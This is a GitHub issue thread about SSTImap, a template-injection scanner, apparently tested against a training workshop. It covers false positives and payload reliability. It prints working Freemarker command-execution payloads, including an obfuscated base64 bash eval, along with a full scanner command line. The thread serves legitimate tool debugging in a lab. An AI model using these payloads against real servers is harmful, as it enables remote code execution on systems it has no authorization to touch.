Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

SSTImap should test simple payload, otherwise may return false positive result #30

Open
alasalamont opened this issue Dec 26, 2023 · 6 comments
Open

SSTImap should test simple payload, otherwise may return false positive result #30

alasalamont opened this issue Dec 26, 2023 · 6 comments
Labels
awaits confirmation The issue is supposed to be resolved, but requires some testing delayed The issue will be fixed with a big update later

Comments

@alasalamont
Copy link

alasalamont commented Dec 26, 2023
edited
Loading

Hi brother,
I did test SSTImap on this workshop, at 25_template_freemarker

https://gosecure.github.io/template-injection-workshop/

When I use simple payload, it works

<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("id")}

But when the tool use its payload, it does not work

${7670795914?c}<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("bash -c {eval,$({tr,/+,_-}<<<ZWNobyBhMA==|{base64,--decode})}") }${7841412055?c}

The site returns

Template blocked: Cannot run program "bash": error=2, No such file or directory ---- FTL stack trace ("~" means nesting-related): - Failed at: ${ex("bash -c {eval,$({tr,/+,_-}\l\l\... [in template "tpl" at line 1, column 72] ----

Because of this, the tool also return false positive result

┌──(root㉿kali)-[/home/kali/Desktop/SSTImap]
└─# python3 sstimap.py -u "http://localhost:8025/admin/edit_page/1" -d "_csrf=ddcf50d0-b5a0-43f5-95dd-351495abc31b&title=Welcome+Page&templateCode=*&action=test" -C "JSESSIONID=182F5156C0D7E1B0A0E72D87D3D4F845" --proxy http://localhost:8080 -l 5 -e Freemarker

                                                          
[*] Version: 1.1.4
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] Loaded plugins by categories: languages: 5; legacy_engines: 1; engines: 16

[*] Scanning url: http://localhost:8025/admin/edit_page/1
[*] Testing if POST parameter 'templateCode' is injectable
[*] Freemarker plugin is testing rendering with tag '*'
[+] Freemarker plugin has confirmed injection with tag '*'
[+] SSTImap identified the following injection point:

  POST parameter: templateCode
  Engine: Freemarker
  Injection: *
  Context: text
  OS: undetected
  Technique: render
  Capabilities:

    Shell command execution: no
    Bind and reverse shell: no
    File write: no
    File read: no
    Code evaluation: no

[+] Rerun SSTImap providing one of the following options:
    --tpl-shell                  Prompt for an interactive shell on the template engine.
    --tpl-cmd                    Inject code in the template engine.
@alasalamont alasalamont changed the title SSTImap should test simple basic, otherwise may return false positive result SSTImap should test simple payload, otherwise may return false positive result Dec 26, 2023
@mrdragonblack
Copy link

same problem but the problem is the web not use template engine or maybe is just junk http packet maybe because error from web like 5xx or waf can cause false positive or the target web not vuln with ssti just junk http

@vladko312
Copy link
Owner

@alasalamont Why is your case false positive? SSTImap correctly identified the template injection as rendered Freemarker using another payload. It was unable to run OS commands, as it tried using bash, but you still can inject template code to try different payloads. This works as intended, as bypassing waf is hard to automate.

I will work on improving the payload system though, as bash is not always present on the target.

@vladko312
Copy link
Owner

@mrdragonblack the problem you described is most likely caused by blind detection with small delay. Increase the delay or disable blind detection

@vladko312 vladko312 added in progress The issue would be fixed in the next minor version awaits confirmation The issue is supposed to be resolved, but requires some testing labels Dec 28, 2023
@alasalamont
Copy link
Author

@alasalamont Why is your case false positive? SSTImap correctly identified the template injection as rendered Freemarker using another payload. It was unable to run OS commands, as it tried using bash, but you still can inject template code to try different payloads. This works as intended, as bypassing waf is hard to automate.

I will work on improving the payload system though, as bash is not always present on the target.

Yup you are correct. I suggest add more some payload to test to double-check. Like in this case, the sysetm has no bash ^^

@vladko312
Copy link
Owner

I suggest add more some payload to test to double-check. Like in this case, the sysetm has no bash

I will do something about that, making more payload variations once the language is detected.

@vladko312
Copy link
Owner

Blind false positives should be fixed in 1.2.0
@mrdragonblack, can you verify?

As for payloads with bash - this will come in later versions

@vladko312 vladko312 added delayed The issue will be fixed with a big update later and removed in progress The issue would be fixed in the next minor version labels Jan 6, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
awaits confirmation The issue is supposed to be resolved, but requires some testing delayed The issue will be fixed with a big update later
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@vladko312 @alasalamont @mrdragonblack